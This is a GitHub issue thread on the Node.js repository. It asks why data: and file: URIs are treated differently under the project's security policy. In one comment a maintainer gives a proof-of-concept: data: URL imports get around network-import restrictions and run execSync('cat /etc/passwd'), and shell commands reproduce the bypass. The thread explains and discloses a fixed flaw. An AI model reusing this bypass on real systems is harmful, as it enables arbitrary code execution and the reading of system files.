Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security question: Why are data: URIs and file: URIs treated differently in your security policy? #53815

Closed
eligrey opened this issue Jul 11, 2024 · 5 comments
Labels
question Issues that look for answers. security Issues and PRs related to security.

Comments

@eligrey
Copy link

eligrey commented Jul 11, 2024

Version

No response

Platform

No response

Subsystem

No response

What steps will reproduce the bug?

I noticed this bug report and asked @RafaelGSS why data: URIs are treated differently from file: URIs in the node.js security policy, as attackers can simply write to a file and then import it to achieve the same effect.

Rafael responded with the following, asking me to file an issue in this bug tracker instead of elaborating on X:

This vulnerability exposes a vulnerability according to Node.js threat model. I can expand more on that if you raise an issue.

But I certainly won't elaborate on a X thread :)

How often does it reproduce? Is there a required condition?

No response

What is the expected behavior? Why is that the expected behavior?

No response

What do you see instead?

N/A. I was requested by @RafaelGSS to use this issue reporting form.

Additional information

No response

@eligrey eligrey changed the title Security question: why are data: URIs and file: URIs treated differently in your security policy? Security question: Why are data: URIs and file: URIs treated differently in your security policy? Jul 11, 2024
@avivkeller
Copy link
Member

avivkeller commented Jul 11, 2024

@nodejs/security-wg
CC @RafaelGSS

@avivkeller avivkeller added question Issues that look for answers. security Issues and PRs related to security. labels Jul 11, 2024
@RafaelGSS
Copy link
Member

So I couple of things first:

  1. The report was disclosed limited, so that's explains why you can only read the summary:

A security flaw in Node.js allows a bypass of network import restrictions.
By embedding non-network imports in data URLs, an attacker can execute arbitrary code, compromising system security.
Verified on various platforms, the vulnerability is mitigated by forbidding data URLs in network imports.
Exploiting this flaw can violate network import security, posing a risk to developers and servers.

I will try to adjust it either way.

  1. I believe your question is unrelated to the vulnerability itself. I will provide more details about the report, but I might not be the best person to explain our resolvers.

Imagine you have an HTTP server with two routes:

  1. /indirect -> returns a
import childProcess from 'data:text/javascript,export { default } from "node:child_process"'
import http from 'data:text/javascript,export { default } from "node:http"'

console.log('BYPASSED')
const data = childProcess.execSync('cat /etc/passwd')
  1. /direct -> returns a import fs from 'node:fs/promises'

While the /direct route produces the expected result:

$ node --experimental-network-imports --import 'http://127.0.0.1:9999/direct.mjs' --eval ''

Error [ERR_NETWORK_IMPORT_DISALLOWED]: import of 'node:fs/promises' by http://localhost:9999/direct.mjs is not supported: only relative and absolute specifiers are supported.

the /indirect is a bypass of this feature's expectations

$ node --experimental-network-imports --import 'http://127.0.0.1:9999/indirect.mjs' --eval ''
BYPASS

@RafaelGSS
Copy link
Member

Also note, that we are discussing removing this feature entirely #53822.

@eligrey
Copy link
Author

eligrey commented Jul 12, 2024

Your response does not acknowledge my question about file: URIs.

I am repeating my question: Why are data: URIs treated differently from file: URIs? Attackers can simply write to a file and then import it to achieve the same effect.

@ghost
Copy link

ghost commented Jul 12, 2024

If you look at the docs for network imports, there's a special restriction.

Cannot load non-network dependencies

These modules cannot access other modules that are not over http: or https:.

The intention is that file: and node: imports will fail under a network import. This means a network import has no way to access the file system and so could not write to a file.

What seems to have happened here is embedding the prohibited import in a data: URL made it work, and gave access to the file system etc which shouldn't have been possible.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
question Issues that look for answers. security Issues and PRs related to security.
Projects
None yet
Development

No branches or pull requests

3 participants